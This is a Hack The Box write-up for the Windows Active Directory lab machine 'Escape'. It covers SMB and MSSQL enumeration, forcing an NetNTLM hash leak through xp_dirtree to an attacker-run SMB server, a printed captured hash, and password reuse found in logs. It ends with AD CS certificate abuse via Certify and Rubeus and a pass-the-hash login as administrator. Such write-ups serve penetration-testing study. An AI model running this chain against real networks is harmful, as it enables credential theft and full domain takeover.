Hack The Box - Escape [Medium] - 20/08/2023

HTB Writeup

This is a Windows Machine which is part of an Active Directory. I would try my best to explain the stuff that I did, since that I’ve seen pretty bad write-ups that are not explaining anything. I also want to be honest, and I will link every write-up that I used to exploit the machine.

I am still learning Active Directory at the time of writing this, so there might be errors, I will do my best to mitigate that!

Enumerating

I started with a simple nmap scan.

$ nmap -Pn 10.10.11.202
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1433/tcp open  ms-sql-s
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Now since I am new to Active Directory I turned to https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb to check what I can try.

Eventually, after trying most of them, I landed on smbclient

$ smbclient --no-pass -L 10.10.11.202
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
Public          Disk      
SYSVOL          Disk      Logon server share 

This is a list of shared folders, the one that we can take a look at is Public

$ smbclient -N //10.10.11.202/Public
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

  5184255 blocks of size 4096. 1276406 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (62.8 KiloBytes/sec) (average 62.8 KiloBytes/sec)

Opening, the PDF states that we can use PublicUser:GuestUserCantWrite1 to log in to the SQL Server. We can use the impacket-mssqlclient which is a tool

$ impacket-mssqlclient WORKGROUP/PublicUser:GuestUserCantWrite1@10.10.11.202

Once I was in I started enumerating the database, looking at this and that, but I had no luck, I turned to some write-ups to follow up.

Now most of the write-ups are just skipping the explanation of this step, but I think that it is really important to know what’s going on, so I will do my best to explain it.

Following up this https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#steal-netntlm-hash-relay-attack attack, I tried the following thing:

I checked if I can execute xp_dirtree:

SQL> EXEC sp_helprotect 'xp_dirtree';
Owner    Object                 Grantee        Grantor   ProtectType   Action           Column   

------   --------------------   ------------   -------   -----------   --------------   ------   

sys      xp_dirtree             public         dbo       b'Grant     '   Execute          .        

It turns out I can, so to capture the authentication hash, I need to set up an SMB server:

# My Machine
$ impacket-smbserver -smb2support smb ./smb

And then to execute the xp_dirtree on the SQL Server

SQL> exec master.dbo.xp_dirtree '\\<myIP>\smb'

Doing this would catch the AUTHENTICATE_MESSAGE, the user and the hash.

$ impacket-smbserver -smb2support smb ./smb

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.202,52180)
[*] AUTHENTICATE_MESSAGE (sequel\sql_svc,DC)
[*] User DC\sql_svc authenticated successfully
[*] sql_svc::sequel:aaaaaaaaaaaaaaaa:84e0a29415d2823f80593c9bc45d158c:010100000000000080fba2b8945ed9010f6267444f7024440000000001001000780056007a005000590061005000570003001000780056007a0050005900610050005700020010006c004f0054006f006f00540076007700040010006c004f0054006f006f005400760077000700080080fba2b8945ed90106000400020000000800300030000000000000000000000000300000c57e7de4e6e8e7baebb297a4bfc1a9019bc96f8f58ffbd9cb233cec428ece87f0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100340032000000000000000000

Now I need to crack the hash, I won’t post the results here, so you have to figure that one on your own, it is simple enough! :)

Using the cracked password, I can log in using the evil-winrm

$ evil-winrm --ip 10.10.11.202 --user sql_svc --password $(cat ./password)

Now, we need to start enumerating again. I used winPEAS

*Evil-WinRM* PS C:\Users\sql_svc\Documents> upload /home/syl/tools/win/winPEASany.exe

I eventually stumbled across interesting files and I’ve enumerated the users. The interesting file was C:\SQLServer\Logs\ERRORLOG.BAK and upon further inspection I’ve got the password for the user Ryan.Cooper.

$ evil-winrm --ip 10.10.11.202 --user Ryan.Cooper --password $(cat ./password ryan_password)
...
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> gc ../Desktop/user.txt
<user_hash>

Now I needed to escalate, I’ve used this guide for misconfigured certificates that cause AD CS Domain Escalation. https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation

I’ve uploaded Certify to the SQL Server (user login) and tried to find vulnerable certificates.

NOTE: Certify is a tool to enumerate and abuse misconfigured AD CS, you can find its source code here: https://github.com/GhostPack/Certify. Unfortunately(or fortunately) there aren’t any prebuilt binaries and you have to build it yourself. It is well explained in the README.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./Certify.exe find /vulnerable
...
[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0

With that tool, I found a vulnerable certificate that I can use to impersonate an administrator. Following up the attack on hacktricks:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

... CERTIFICATE ...

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

I’ve downloaded the certificate on my machine and ran the command to convert it to pfx and I’ve uploaded it back to the server.

Using another tool called Rubeus that I’ve used to send raw request for a TGT towards the DC.

$ ./Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /password:123

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::5438:a078:e66d:b560%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
...
[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : <NTLM HASH>

Now, that gave me the NTLM Hash, which is the cryptographic format in which user passwords are stored on Windows systems.

I can use that with:

$ evil-winrm -H "<NTLM HASH>" -u "administrator" -i 10.10.11.202
M* PS C:\Users\Administrator\Documents> gc ../Desktop/root.txt
<root_hash>

References